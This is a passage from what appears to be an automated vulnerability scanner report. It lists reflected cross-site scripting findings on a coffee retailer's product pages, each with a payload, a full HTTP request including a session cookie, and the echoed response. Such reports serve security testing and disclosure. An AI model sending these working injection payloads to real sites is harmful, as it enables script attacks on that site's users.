GET /coffee/starbucks-natural-fusions/caramel?72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:26 GMT
Connection: close
Content-Length: 42434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?72f92"style="x:expression(alert(1))"a4e88aeeae4=1"/>
...[SNIP]...

3.9. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96717"style="x:expression(alert(1))"9bd61317b0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-natural-fusions/cinnamon?96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:59 GMT
Connection: close
Content-Length: 42477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?96717"style="x:expression(alert(1))"9bd61317b0b=1"/>
...[SNIP]...

3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da712"style%3d"x%3aexpression(alert(1))"153353c2d05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da712"style="x:expression(alert(1))"153353c2d05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-natural-fusions/savoring?da712"style%3d"x%3aexpression(alert(1))"153353c2d05=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:58:58 GMT
Connection: close
Content-Length: 41224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?da712"style="x:expression(alert(1))"153353c2d05=1"/>
...[SNIP]...

3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b02"style%3d"x%3aexpression(alert(1))"11530d23784 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0b02"style="x:expression(alert(1))"11530d23784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-natural-fusions/vanilla?e0b02"style%3d"x%3aexpression(alert(1))"11530d23784=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:43 GMT
Connection: close
Content-Length: 42403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?e0b02"style="x:expression(alert(1))"11530d23784=1"/>
...[SNIP]...

3.12. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c78ef"style="x:expression(alert(1))"30e6886810a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee?c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:03 GMT
Connection: close
Content-Length: 52822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?c78ef"style="x:expression(alert(1))"30e6886810a=1"/>
...[SNIP]...

3.13. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c317"style="x:expression(alert(1))"4e1c91bd61f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:31 GMT
Connection: close
Content-Length: 42269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style="x:expression(alert(1))"4e1c91bd61f=1"/>
...[SNIP]...

3.14. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f782"style="x:expression(alert(1))"945e17cc48d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:14 GMT
Content-Length: 41929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style="x:expression(alert(1))"945e17cc48d=1"/>
...[SNIP]...

3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6142"style="x:expression(alert(1))"e771ce6760f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:14 GMT
Connection: close
Content-Length: 43000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style="x:expression(alert(1))"e771ce6760f=1"/>
...[SNIP]...

3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/nicaragua-corcasan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2762f"style="x:expression(alert(1))"d1da931e99d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:45 GMT
Connection: close
Content-Length: 42842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style="x:expression(alert(1))"d1da931e99d=1"/>
...[SNIP]...

3.17. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 818c9"style="x:expression(alert(1))"3aaeb9fa4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/via?818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:49 GMT
Connection: close
Content-Length: 51777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via?818c9"style="x:expression(alert(1))"3aaeb9fa4a=1"/>
...[SNIP]...

3.18. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4285"style="x:expression(alert(1))"cebb7d2a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/via/flavored-coffee?d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:37 GMT
Content-Length: 53694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?d4285"style="x:expression(alert(1))"cebb7d2a308=1"/>
...[SNIP]...

3.19. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7511a"style="x:expression(alert(1))"c08da2b8d6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/via/instant-coffee?7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:24 GMT
Connection: close
Content-Length: 53628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?7511a"style="x:expression(alert(1))"c08da2b8d6b=1"/>
...[SNIP]...

3.20. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32506"style%3d"x%3aexpression(alert(1))"0b3e0429598 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32506"style="x:expression(alert(1))"0b3e0429598 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/whole-bean-coffee?32506"style%3d"x%3aexpression(alert(1))"0b3e0429598=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:46 GMT
Connection: close
Content-Length: 54456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?32506"style="x:expression(alert(1))"0b3e0429598=1"/>
...[SNIP]...

3.21. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fd8"style="x:expression(alert(1))"eee799f60ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /coffee/whole-bean-coffee/africa-arabia?36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:18 GMT
Connection: close
Content-Length: 41207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?36fd8"style="x:expression(alert(1))"eee799f60ab=1"/>
...[SNIP]...

3.22. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d4f5"style="x:expression(alert(1))"07322c9d36a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

